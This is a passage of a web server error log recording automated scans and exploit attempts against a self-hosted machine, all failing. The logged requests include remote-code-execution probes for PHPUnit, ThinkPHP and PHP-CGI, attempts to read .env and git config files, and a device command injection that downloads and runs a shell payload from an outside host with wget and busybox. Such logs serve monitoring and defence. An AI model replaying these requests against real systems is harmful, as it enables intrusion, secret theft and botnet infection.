/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 21:59:29 [error] 263#263: *4507 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 216.108.237.50, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 21:59:30 [error] 263#263: *4507 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 216.108.237.50, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 21:59:31 [error] 263#263: *4507 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 216.108.237.50, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 21:59:31 [error] 263#263: *4507 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 216.108.237.50, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 21:59:32 [error] 263#263: *4507 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 216.108.237.50, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 21:59:33 [error] 263#263: *4507 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 216.108.237.50, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 21:59:33 [error] 263#263: *4507 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 216.108.237.50, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 21:59:34 [error] 263#263: *4507 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 216.108.237.50, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 21:59:35 [error] 263#263: *4507 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 216.108.237.50, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 21:59:35 [error] 263#263: *4507 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 216.108.237.50, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 21:59:36 [error] 263#263: *4507 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 216.108.237.50, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 21:59:37 [error] 263#263: *4507 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 216.108.237.50, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 21:59:37 [error] 263#263: *4507 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 216.108.237.50, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 21:59:38 [error] 263#263: *4507 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 216.108.237.50, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 21:59:39 [error] 263#263: *4507 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 216.108.237.50, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 21:59:39 [error] 263#263: *4507 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 216.108.237.50, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 21:59:40 [error] 263#263: *4507 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 216.108.237.50, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 21:59:40 [error] 263#263: *4507 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 216.108.237.50, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 21:59:41 [error] 263#263: *4507 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 216.108.237.50, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 21:59:42 [error] 263#263: *4507 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 216.108.237.50, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 21:59:43 [error] 263#263: *4507 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 216.108.237.50, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 21:59:43 [error] 263#263: *4507 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 216.108.237.50, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 21:59:44 [error] 263#263: *4507 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 216.108.237.50, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 21:59:46 [error] 263#263: *4507 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 216.108.237.50, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 22:14:27 [error] 260#260: *4525 open() "/var/www/html/GponForm/diag_Form" failed (2: No such file or directory), client: 42.224.194.87, server: localhost-nginx-proxy-manager, request: "POST /GponForm/diag_Form?images/ HTTP/1.1", host: "127.0.0.1:80" +2026/01/31 23:06:46 [error] 267#267: *4563 open() "/var/www/html/goform/formJsonAjaxReq" failed (2: No such file or directory), client: 176.65.139.8, server: localhost-nginx-proxy-manager, request: "POST /goform/formJsonAjaxReq HTTP/1.1", host: "78.131.122.113:80", referrer: "http://78.131.122.113:80/home.asp" +2026/01/31 23:17:21 [error] 267#267: *4567 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 91.224.92.115, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "78.131.122.113:80" +2026/01/31 23:38:11 [error] 267#267: *4583 open() "/var/www/html/admin/config.php" failed (2: No such file or directory), client: 102.22.20.125, server: localhost-nginx-proxy-manager, request: "GET /admin/config.php HTTP/1.0", host: "78.131.122.113" +2026/01/31 23:57:39 [error] 267#267: *4588 open() "/var/www/html/console" failed (2: No such file or directory), client: 185.180.140.103, server: localhost-nginx-proxy-manager, request: "GET /console HTTP/1.1", host: "78.131.122.113" +2026/02/01 00:03:05 [error] 268#268: *4594 "/var/www/html/webui/index.html" is not found (2: No such file or directory), client: 65.49.1.80, server: localhost-nginx-proxy-manager, request: "GET /webui/ HTTP/1.1", host: "78.131.122.113" +2026/02/01 00:05:36 [error] 270#270: *6084 "/var/www/html/geoserver/web/index.html" is not found (2: No such file or directory), client: 65.49.1.80, server: localhost-nginx-proxy-manager, request: "GET /geoserver/web/ HTTP/1.1", host: "78.131.122.113" +2026/02/01 00:25:36 [error] 270#270: *6092 open() "/var/www/html/developmentserver/metadatauploader" failed (2: No such file or directory), client: 20.40.217.42, server: localhost-nginx-proxy-manager, request: "GET /developmentserver/metadatauploader HTTP/1.1", host: "78.131.122.113" +2026/02/01 00:54:03 [error] 269#269: *7632 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 165.154.226.238, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 01:37:31 [error] 270#270: *7660 open() "/var/www/html/System/configurationFile" failed (2: No such file or directory), client: 46.226.162.154, server: localhost-nginx-proxy-manager, request: "GET /System/configurationFile?auth=YWRtaW46MTEK HTTP/1.1", host: "78.131.122.113" +2026/02/01 01:39:17 [error] 270#270: *7661 open() "/var/www/html/hudson" failed (2: No such file or directory), client: 172.174.200.225, server: localhost-nginx-proxy-manager, request: "GET /hudson HTTP/1.1", host: "78.131.122.113" +2026/02/01 02:39:50 [error] 267#267: *7683 open() "/var/www/html/ReportServer" failed (2: No such file or directory), client: 20.55.88.105, server: localhost-nginx-proxy-manager, request: "GET /ReportServer HTTP/1.1", host: "78.131.122.113" +2026/02/01 03:03:20 [error] 270#270: *9180 open() "/var/www/html/robots.txt" failed (2: No such file or directory), client: 168.76.20.229, server: localhost-nginx-proxy-manager, request: "GET /robots.txt HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 03:03:30 [error] 270#270: *9183 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 03:03:30 [error] 270#270: *9183 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 03:03:31 [error] 270#270: *9183 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 03:03:31 [error] 270#270: *9183 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 03:03:31 [error] 270#270: *9183 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 03:03:31 [error] 270#270: *9183 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 03:03:32 [error] 270#270: *9183 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 03:03:32 [error] 270#270: *9183 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 03:03:32 [error] 270#270: *9183 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 03:03:32 [error] 270#270: *9183 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 03:03:33 [error] 270#270: *9183 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 03:03:33 [error] 270#270: *9183 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 03:03:33 [error] 270#270: *9183 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 03:03:33 [error] 270#270: *9183 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 03:03:34 [error] 270#270: *9183 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 03:03:34 [error] 270#270: *9183 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 03:03:34 [error] 270#270: *9183 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 03:03:34 [error] 270#270: *9183 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 03:03:35 [error] 270#270: *9183 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 03:03:35 [error] 270#270: *9183 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 03:03:35 [error] 270#270: *9183 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 03:03:35 [error] 270#270: *9183 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 03:03:36 [error] 270#270: *9183 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 03:03:36 [error] 270#270: *9183 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 03:03:36 [error] 270#270: *9183 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 03:03:36 [error] 270#270: *9183 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 03:03:37 [error] 270#270: *9183 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 03:03:37 [error] 270#270: *9183 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 03:03:37 [error] 270#270: *9183 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 03:03:37 [error] 270#270: *9183 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 03:03:38 [error] 270#270: *9183 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 03:03:38 [error] 270#270: *9183 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 03:03:38 [error] 270#270: *9183 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 03:03:38 [error] 270#270: *9183 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 03:03:39 [error] 270#270: *9183 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 03:03:39 [error] 270#270: *9183 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 03:03:39 [error] 270#270: *9183 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 03:03:39 [error] 270#270: *9183 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 03:03:40 [error] 270#270: *9183 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 03:03:40 [error] 270#270: *9183 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 03:03:41 [error] 270#270: *9183 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 103.40.61.98, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 03:39:55 [error] 267#267: *9197 open() "/var/www/html/.env" failed (2: No such file or directory), client: 159.203.169.243, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "78.131.122.113" +2026/02/01 03:39:55 [error] 267#267: *9198 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 159.203.169.243, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "78.131.122.113" +2026/02/01 04:05:07 [error] 267#267: *9224 open() "/var/www/html/.env" failed (2: No such file or directory), client: 4.194.156.15, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "profibot.direct.quickconnect.to" +2026/02/01 04:16:50 [error] 274#274: *9228 open() "/var/www/html/cgi/conf.bin" failed (2: No such file or directory), client: 194.50.16.253, server: localhost-nginx-proxy-manager, request: "GET /cgi/conf.bin HTTP/1.1", host: "78.131.122.113", referrer: "http://78.131.122.113:80/mainFrame.htm" +2026/02/01 04:20:51 [error] 275#275: *9230 open() "/var/www/html/.env" failed (2: No such file or directory), client: 77.83.39.207, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "78.131.122.113" +2026/02/01 05:36:04 [error] 274#274: *9256 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 5.61.209.92, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 05:38:36 [error] 274#274: *9257 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 91.224.92.115, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 07:31:11 [error] 276#276: *9367 open() "/var/www/html/SDK/webLanguage" failed (2: No such file or directory), client: 89.42.231.200, server: localhost-nginx-proxy-manager, request: "GET /SDK/webLanguage HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 07:39:52 [error] 276#276: *9371 open() "/var/www/html/device.rsp" failed (2: No such file or directory), client: 130.12.180.108, server: localhost-nginx-proxy-manager, request: "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=busybox%20reboot%3B%20reboot HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 07:50:21 [error] 276#276: *9376 open() "/var/www/html/device.rsp" failed (2: No such file or directory), client: 130.12.180.108, server: localhost-nginx-proxy-manager, request: "POST /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd%20%2Ftmp%3B%20busybox%20rm%20bbc%3B%20wget%20http%3A%2F%2F130.12.180.22%3A8080%2Ffile%2Fbbc%3B%20busybox%20sh%20bbc HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 07:54:36 [error] 275#275: *10878 open() "/var/www/html/login" failed (2: No such file or directory), client: 167.94.138.124, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "78.131.122.113" +2026/02/01 08:05:49 [error] 276#276: *10884 open() "/var/www/html/cgi-bin/luci/;stok=/locale" failed (2: No such file or directory), client: 91.224.92.115, server: localhost-nginx-proxy-manager, request: "GET /cgi-bin/luci/;stok=/locale HTTP/1.1", host: "78.131.122.113:80" +2026/02/01 08:11:37 [error] 276#276: *10889 open() "/var/www/html/boaform/admin/formLogin" failed (2: No such file or directory), client: 124.198.131.145, server: localhost-nginx-proxy-manager, request: "POST /boaform/admin/formLogin HTTP/1.1", host: "78.131.122.113:80", referrer: "http://78.131.122.113:80/admin/login.asp" +2026/02/01 08:42:25 [error] 276#276: *10897 open() "/var/www/html/actuator/health" failed (2: No such file or directory), client: 13.89.124.208, server: localhost-nginx-proxy-manager, request: "GET /actuator/health HTTP/1.1", host: "78.131.122.113" +2026/02/01 10:00:22 [error] 277#277: *10986 open() "/var/www/html/web.config" failed (2: No such file or directory), client: 116.62.33.140, server: localhost-nginx-proxy-manager, request: "GET /web.config HTTP/1.1", host: "78.131.122.113" +2026/02/01 10:00:22 [error] 277#277: *10987 open() "/var/www/html/connection.rdp" failed (2: No such file or directory), client: 116.62.33.140, server: localhost-nginx-proxy-manager, request: "GET /connection.rdp HTTP/1.1", host: "78.131.122.113" +2026/02/01 10:00:23 [error] 277#277: *10988 open() "/var/www/html/server.rdp" failed (2: No such file or directory), client: 116.62.33.140, server: localhost-nginx-proxy-manager, request: "GET /server.rdp HTTP/1.1", host: "78.131.122.113" +2026/02/01 10:00:24 [error] 277#277: *10989 open() "/var/www/html/default.rdp" failed (2: No such file or directory), client: 116.62.33.140, server: localhost-nginx-proxy-manager, request: "GET /default.rdp HTTP/1.1", host: "78.131.122.113" +2026/02/01 10:00:25 [error] 274#274: *10990 open() "/var/www/html/rdp/connection.rdp" failed (2: No such file or directory), client: 116.62.33.140, server: localhost-nginx-proxy-manager, request: "GET /rdp/connection.rdp HTTP/1.1", host: "78.131.122.113" +2026/02/01 10:00:26 [error] 274#274: *10991 open() 